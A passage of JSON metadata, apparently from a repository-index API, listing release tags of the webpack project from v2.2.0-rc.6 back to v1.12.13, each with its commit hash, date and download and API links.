8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2